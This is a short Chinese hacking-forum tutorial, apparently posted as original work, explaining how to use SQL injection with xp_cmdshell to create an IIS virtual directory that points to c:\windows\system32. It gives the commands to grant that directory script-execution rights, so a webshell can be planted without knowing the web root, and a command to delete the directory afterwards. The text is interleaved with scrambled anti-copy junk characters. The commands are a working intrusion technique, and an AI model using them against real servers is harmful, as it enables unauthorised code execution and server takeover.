返回列表 发帖

[原创教程] 如何SQL注入建立虚拟目录

很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:$ p+ s/ ]% s9 x0 D5 |$ g0 d$ a4 X
/ M% l- b1 Z# C. [" n. [, a
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'6 i/ Q. e  U- e- P
建立虚拟目录win,指向c:\windows\system32* ~; w" `( R0 O+ l
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'5 U  F" C, d  F, g
让win句有解析asp脚本权限
3 x0 Z+ n' w( i, @1 `1 _( P$ z  e& U* E& A, U1 d1 Q- [" G3 y
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"* m5 o5 r- ]1 e/ f* o! G1 J9 M! i" B
删除虚拟目录。8 g0 g4 P# X2 s# @/ i
找不到web绝对路径的一种解决办法,4 K$ s0 V" }; b6 `0 s. ^9 j! C

0 P2 @  ]3 R2 |$ l403错误,表示虚拟目录建好了。。
1

评分人数

呀  LZ好久不见你上了啊

TOP

返回列表